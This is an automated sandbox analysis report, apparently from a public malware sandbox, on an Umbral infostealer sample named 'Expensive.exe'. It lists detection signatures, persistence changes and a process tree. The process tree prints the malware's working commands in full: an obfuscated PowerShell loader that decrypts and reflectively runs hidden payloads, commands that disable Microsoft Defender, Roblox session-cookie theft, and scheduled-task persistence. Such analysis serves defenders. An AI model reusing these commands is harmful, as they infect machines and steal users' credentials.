umbral | 3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-05-2024 16:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Expensive.exe
Size

599KB
MD5

65e4c0420f496abb02201df254eb87a1
SHA1

6efcf4be11132a32a3df5029c87d2daa466fcc1a
SHA256

3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44
SHA512

bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb
SSDEEP

12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1

Score

10^/10

umbral execution persistence spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Umbral.exe	family_umbral
behavioral2/memory/1772-71-0x00000266F5C70000-0x00000266F5CB0000-memory.dmp	family_umbral

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Client.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\Sub\\Client.exe"	Client.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4900 powershell.exe
2880 powershell.exe
4856 powershell.exe
4428 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

Umbral.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe
Modifies AppInit DLL entries 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

pid	process
4900	powershell.exe
2880	powershell.exe
4856	powershell.exe
4428	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Expensive.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	Expensive.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 3 IoCs

Processes:

ExpensiveLauncher.exeUmbral.exeClient.exe

pid process

3828 ExpensiveLauncher.exe
1772 Umbral.exe
3652 Client.exe

pid	process
3828	ExpensiveLauncher.exe
1772	Umbral.exe
3652	Client.exe

Loads dropped DLL 40 IoCs

Processes:

pid	process
2784
4344
1496
1360
4436
2324
676
2628
4488
4892
3964
4944
2216
1640
760
1508
2740
2616
3176
4544
4884
4552
3628
3352
1112
3316
1612
4464
4396
756
1368
2576
4020
3100
4176
4812
1512
1640
2532
3780

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Client.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Windows\\Sub\\WatchDog.exe"	Client.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

36 discord.com
37 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ip-api.com

flow	ioc
36	discord.com
37	discord.com

flow	ioc
28	ip-api.com

Drops file in Windows directory 6 IoCs

Processes:

Client.exe

description	ioc	process
File created	C:\Windows\Sub\Client.exe	Client.exe
File opened for modification	C:\Windows\Sub\Client.exe	Client.exe
File opened for modification	C:\Windows\Sub	Client.exe
File created	C:\Windows\Sub\WatchDog.exe	Client.exe
File opened for modification	C:\Windows\Sub\WatchDog.exe	Client.exe
File created	C:\Windows\xdwd.dll	Client.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 40 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
752	schtasks.exe
4968	schtasks.exe
1400	schtasks.exe
4416	schtasks.exe
2076	schtasks.exe
1068	schtasks.exe
2412	schtasks.exe
1508	schtasks.exe
4412	schtasks.exe
3204	schtasks.exe
3316	schtasks.exe
2628	schtasks.exe
2232	schtasks.exe
3356	schtasks.exe
612	schtasks.exe
1704	schtasks.exe
4084	schtasks.exe
4400	schtasks.exe
4416	schtasks.exe
3356	schtasks.exe
4680	schtasks.exe
3612	schtasks.exe
2480	schtasks.exe
3968	schtasks.exe
3696	schtasks.exe
4412	schtasks.exe
2536	schtasks.exe
1584	schtasks.exe
212	schtasks.exe
3932	schtasks.exe
4344	schtasks.exe
1836	schtasks.exe
2704	schtasks.exe
116	schtasks.exe
3528	schtasks.exe
1112	schtasks.exe
4656	schtasks.exe
3184	schtasks.exe
4084	schtasks.exe
3964	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

1928 wmic.exe

pid	process
1928	wmic.exe

Modifies registry class 10 IoCs

Processes:

ExpensiveLauncher.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol"	ExpensiveLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\URL Protocol	ExpensiveLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell	ExpensiveLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open	ExpensiveLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe"	ExpensiveLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347	ExpensiveLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon	ExpensiveLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe"	ExpensiveLauncher.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\discord-1199748644409184347\shell\open\command	ExpensiveLauncher.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5068 PING.EXE

pid	process
5068	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeUmbral.exepowershell.exepowershell.exepowershell.exepowershell.exeClient.exe

pid	process
4856	powershell.exe
4856	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
4428	powershell.exe
4428	powershell.exe
1772	Umbral.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe
1452	powershell.exe
1452	powershell.exe
1452	powershell.exe
4596	powershell.exe
4596	powershell.exe
4596	powershell.exe
1068	powershell.exe
1068	powershell.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe
3652	Client.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeIncreaseQuotaPrivilege	4900	powershell.exe
Token: SeSecurityPrivilege	4900	powershell.exe
Token: SeTakeOwnershipPrivilege	4900	powershell.exe
Token: SeLoadDriverPrivilege	4900	powershell.exe
Token: SeSystemProfilePrivilege	4900	powershell.exe
Token: SeSystemtimePrivilege	4900	powershell.exe
Token: SeProfSingleProcessPrivilege	4900	powershell.exe
Token: SeIncBasePriorityPrivilege	4900	powershell.exe
Token: SeCreatePagefilePrivilege	4900	powershell.exe
Token: SeBackupPrivilege	4900	powershell.exe
Token: SeRestorePrivilege	4900	powershell.exe
Token: SeShutdownPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeSystemEnvironmentPrivilege	4900	powershell.exe
Token: SeRemoteShutdownPrivilege	4900	powershell.exe
Token: SeUndockPrivilege	4900	powershell.exe
Token: SeManageVolumePrivilege	4900	powershell.exe
Token: 33	4900	powershell.exe
Token: 34	4900	powershell.exe
Token: 35	4900	powershell.exe
Token: 36	4900	powershell.exe
Token: SeIncreaseQuotaPrivilege	4900	powershell.exe
Token: SeSecurityPrivilege	4900	powershell.exe
Token: SeTakeOwnershipPrivilege	4900	powershell.exe
Token: SeLoadDriverPrivilege	4900	powershell.exe
Token: SeSystemProfilePrivilege	4900	powershell.exe
Token: SeSystemtimePrivilege	4900	powershell.exe
Token: SeProfSingleProcessPrivilege	4900	powershell.exe
Token: SeIncBasePriorityPrivilege	4900	powershell.exe
Token: SeCreatePagefilePrivilege	4900	powershell.exe
Token: SeBackupPrivilege	4900	powershell.exe
Token: SeRestorePrivilege	4900	powershell.exe
Token: SeShutdownPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeSystemEnvironmentPrivilege	4900	powershell.exe
Token: SeRemoteShutdownPrivilege	4900	powershell.exe
Token: SeUndockPrivilege	4900	powershell.exe
Token: SeManageVolumePrivilege	4900	powershell.exe
Token: 33	4900	powershell.exe
Token: 34	4900	powershell.exe
Token: 35	4900	powershell.exe
Token: 36	4900	powershell.exe
Token: SeIncreaseQuotaPrivilege	4900	powershell.exe
Token: SeSecurityPrivilege	4900	powershell.exe
Token: SeTakeOwnershipPrivilege	4900	powershell.exe
Token: SeLoadDriverPrivilege	4900	powershell.exe
Token: SeSystemProfilePrivilege	4900	powershell.exe
Token: SeSystemtimePrivilege	4900	powershell.exe
Token: SeProfSingleProcessPrivilege	4900	powershell.exe
Token: SeIncBasePriorityPrivilege	4900	powershell.exe
Token: SeCreatePagefilePrivilege	4900	powershell.exe
Token: SeBackupPrivilege	4900	powershell.exe
Token: SeRestorePrivilege	4900	powershell.exe
Token: SeShutdownPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeSystemEnvironmentPrivilege	4900	powershell.exe
Token: SeRemoteShutdownPrivilege	4900	powershell.exe
Token: SeUndockPrivilege	4900	powershell.exe
Token: SeManageVolumePrivilege	4900	powershell.exe
Token: 33	4900	powershell.exe
Token: 34	4900	powershell.exe
Token: 35	4900	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Expensive.exeExpensiveLauncher.execmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exeUmbral.execmd.exeClient.exeCMD.exeCMD.exe

description	pid	process	target process
PID 3100 wrote to memory of 3828	3100	Expensive.exe	ExpensiveLauncher.exe
PID 3100 wrote to memory of 3828	3100	Expensive.exe	ExpensiveLauncher.exe
PID 3100 wrote to memory of 5076	3100	Expensive.exe	cmd.exe
PID 3100 wrote to memory of 5076	3100	Expensive.exe	cmd.exe
PID 3828 wrote to memory of 2396	3828	ExpensiveLauncher.exe	cmd.exe
PID 3828 wrote to memory of 2396	3828	ExpensiveLauncher.exe	cmd.exe
PID 5076 wrote to memory of 1820	5076	cmd.exe	net.exe
PID 5076 wrote to memory of 1820	5076	cmd.exe	net.exe
PID 1820 wrote to memory of 1512	1820	net.exe	net1.exe
PID 1820 wrote to memory of 1512	1820	net.exe	net1.exe
PID 5076 wrote to memory of 4856	5076	cmd.exe	powershell.exe
PID 5076 wrote to memory of 4856	5076	cmd.exe	powershell.exe
PID 4856 wrote to memory of 4900	4856	powershell.exe	powershell.exe
PID 4856 wrote to memory of 4900	4856	powershell.exe	powershell.exe
PID 4856 wrote to memory of 820	4856	powershell.exe	WScript.exe
PID 4856 wrote to memory of 820	4856	powershell.exe	WScript.exe
PID 820 wrote to memory of 4796	820	WScript.exe	cmd.exe
PID 820 wrote to memory of 4796	820	WScript.exe	cmd.exe
PID 4796 wrote to memory of 1400	4796	cmd.exe	net.exe
PID 4796 wrote to memory of 1400	4796	cmd.exe	net.exe
PID 1400 wrote to memory of 3608	1400	net.exe	net1.exe
PID 1400 wrote to memory of 3608	1400	net.exe	net1.exe
PID 4796 wrote to memory of 4428	4796	cmd.exe	powershell.exe
PID 4796 wrote to memory of 4428	4796	cmd.exe	powershell.exe
PID 4428 wrote to memory of 1772	4428	powershell.exe	Umbral.exe
PID 4428 wrote to memory of 1772	4428	powershell.exe	Umbral.exe
PID 4428 wrote to memory of 3652	4428	powershell.exe	Client.exe
PID 4428 wrote to memory of 3652	4428	powershell.exe	Client.exe
PID 1772 wrote to memory of 4120	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 4120	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 1928	1772	Umbral.exe	attrib.exe
PID 1772 wrote to memory of 1928	1772	Umbral.exe	attrib.exe
PID 1772 wrote to memory of 2880	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 2880	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 3612	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 3612	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 1452	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 1452	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 4596	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 4596	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 2108	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 2108	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 1508	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 1508	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 2148	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 2148	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 1068	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 1068	1772	Umbral.exe	powershell.exe
PID 1772 wrote to memory of 1928	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 1928	1772	Umbral.exe	wmic.exe
PID 1772 wrote to memory of 4612	1772	Umbral.exe	cmd.exe
PID 1772 wrote to memory of 4612	1772	Umbral.exe	cmd.exe
PID 4612 wrote to memory of 5068	4612	cmd.exe	PING.EXE
PID 4612 wrote to memory of 5068	4612	cmd.exe	PING.EXE
PID 3652 wrote to memory of 1712	3652	Client.exe	CMD.exe
PID 3652 wrote to memory of 1712	3652	Client.exe	CMD.exe
PID 1712 wrote to memory of 3612	1712	CMD.exe	schtasks.exe
PID 1712 wrote to memory of 3612	1712	CMD.exe	schtasks.exe
PID 3652 wrote to memory of 4696	3652	Client.exe	CMD.exe
PID 3652 wrote to memory of 4696	3652	Client.exe	CMD.exe
PID 4696 wrote to memory of 2480	4696	CMD.exe	schtasks.exe
PID 4696 wrote to memory of 2480	4696	CMD.exe	schtasks.exe
PID 3652 wrote to memory of 4544	3652	Client.exe	CMD.exe
PID 3652 wrote to memory of 4544	3652	Client.exe	CMD.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

1928 attrib.exe

pid	process
1928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Expensive.exe
"C:\Users\Admin\AppData\Local\Temp\Expensive.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3100

C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
3⤵
PID:2396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:5076

C:\Windows\system32\net.exe
net file
3⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
4⤵
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_451_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_451.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_451.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_451.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\system32\net.exe
net file
6⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
7⤵
PID:3608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Roaming\startup_str_451.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4428

C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
8⤵
PID:4120

C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
8⤵
- Views/modifies file attributes
PID:1928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
8⤵
PID:3612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:4596

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
8⤵
PID:2108

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
8⤵
PID:1508

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
8⤵
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1068

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
8⤵
- Detects videocard installed
PID:1928

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
8⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\system32\PING.EXE
ping localhost
9⤵
- Runs ping.exe
PID:5068

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe" & exit
8⤵
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\system32\schtasks.exe
SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "AssemblyBroker" /tr "C:\Windows\Sub\Client.exe"
9⤵
- Creates scheduled task(s)
PID:3612

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2480

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST & exit
8⤵
PID:4544

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo 5 /tn "Svhost" /tr "C:\Windows\Sub\WatchDog.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2628

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4680

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3968

